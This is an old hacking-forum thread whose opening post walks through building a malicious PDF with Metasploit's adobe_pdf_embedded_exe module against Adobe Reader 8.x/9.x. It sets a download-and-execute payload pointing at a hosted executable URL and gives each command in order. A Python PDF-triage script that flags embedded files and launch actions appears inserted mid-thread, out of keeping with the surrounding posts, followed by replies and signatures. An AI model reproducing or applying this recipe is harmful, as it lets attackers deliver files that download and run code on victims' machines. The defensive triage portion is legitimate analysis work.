Hello everyone, haven't been here in a while, just wanted to say what's up to everyone and the mods.
Before I start I have a question for the mods: why have you disabled most of my privileges??
This tutorial is for educational purposes only and nothing more. By the way, if you try to use this exploit, good luck; it's picked up by all major AV vendors.
More File Format exploit tutorials here: Enc0de's blog: File Format tutorial exploits (PDF/Office)
This tutorial with pictures here: Enc0de's blog: Adobe PDF Embedded EXE (Adobe Reader v8.x, v9.x)
====Let's get started====
The exploit I will be using in this tutorial will only affect Adobe Reader v8.x, v9.x (Windows XP SP3 English).
First you need an exe file you wish to link to the PDF exploit. I will be using calc.exe; you can use anything you like. Now once you have figured out what file you want the PDF exploit to download execute, go ahead and upload it to ripway. After all that is done and ready, start up Metasploit.
I always recommend running an update first.
Code:
svn up
Once the update is completed run this to pick the exploit.
Code:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Now once we have launched the correct exploit, let's run show options to see what it requires from us in order to generate the PDF.
Code:
show options
Now from looking at the picture we see we need to input a PDF file, so go ahead and download whatever one you would like. Once you get the PDF file you want to insert, please keep it in your /root/ directory to keep it simple.
Now I found one that I want to use, so I will place it on my desktop and name it IN.pdf. Now once it's on the desktop, let's insert the correct location of the PDF in Metasploit.
Code:
set INFILENAME /root/IN.pdf
Ok, now we need to pick a payload, and the one we are going to be using is the download execute payload.
Code:
set payload windows/download_exec
show options
Ok, you see the highlighted part in the white; this was added from inserting the payload download execute. Now I hope you have uploaded the file you want the PDF to download execute; if not, go ahead and do so.
Once you get the link we insert it like this.
hxxp://h1.ripway.com/Hrevolution/calc.exe
Code:
set url hxxp://h1.ripway.com/Hrevolution/calc.exe
Then all you need to do is just type exploit
Code:
exploit
Stand up and be counted as a linux user.
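From the defender's side, a document like the one built above can be triaged before anyone opens it. The script below is an added example, not part of the original post or of Metasploit: it assumes (from the module name) that the file carries an embedded file plus an action that launches it, and counts the PDF name tokens usually checked for that, decoding #xx-escaped names first. The keyword list, function names and both sample byte strings are constructed for this example.

```python
import re

# Name tokens commonly reviewed when triaging a PDF (heuristic list chosen
# for this example; a hit means "look closer", not "malicious").
RISKY_NAMES = ("EmbeddedFile", "EmbeddedFiles", "Launch", "OpenAction",
               "AA", "JavaScript", "JS")

# A PDF name is "/" followed by characters up to whitespace or a delimiter.
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Undo #xx escapes so that /La#75nch is counted as /Launch."""
    plain = HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return plain.decode("latin-1")


def triage_pdf(data: bytes) -> dict:
    """Count risky names in raw PDF bytes and flag combinations worth review.

    Names inside compressed object streams are not seen by this scan.
    """
    counts = {name: 0 for name in RISKY_NAMES}
    for match in NAME_RE.finditer(data):
        name = decode_name(match.group(1))
        if name in counts:
            counts[name] += 1
    embedded = counts["EmbeddedFile"] + counts["EmbeddedFiles"]
    active = counts["Launch"] + counts["JavaScript"] + counts["JS"]
    flags = []
    if counts["Launch"] and embedded:
        flags.append("launch action alongside an embedded file")
    if active and (counts["OpenAction"] or counts["AA"]):
        flags.append("active content with an automatic action")
    return {"counts": counts, "flags": flags}


# Constructed samples: dictionary fragments only, not working documents.
BENIGN = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
SUSPECT = (b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R "
           b"/Names << /EmbeddedFiles 3 0 R >> >>\nendobj\n"
           b"2 0 obj\n<< /S /La#75nch >>\nendobj\n"
           b"4 0 obj\n<< /Type /EmbeddedFile >>\nendobj\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, triage_pdf(sample)["flags"])
```

To check a real attachment, pass `open(path, "rb").read()` to `triage_pdf` on an analysis host and treat any flag as a reason to inspect the file further, not as a verdict.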
I haven't done much with PDF exploits in metasploit lately, so this tutorial will be just the thing to refresh my memory. Thanks!
If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...
For anyone else digging or re-digging into this like scottm99, you might wanna check out Didier Stevens' blog; he's got lots of great PDF stuff:
http://blog.didierstevens.com/
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Appreciate the link, thorin. There's some good stuff on his blog.
If I could figure out how to scuba dive & hack at the same time, there would be nothing I couldn't do...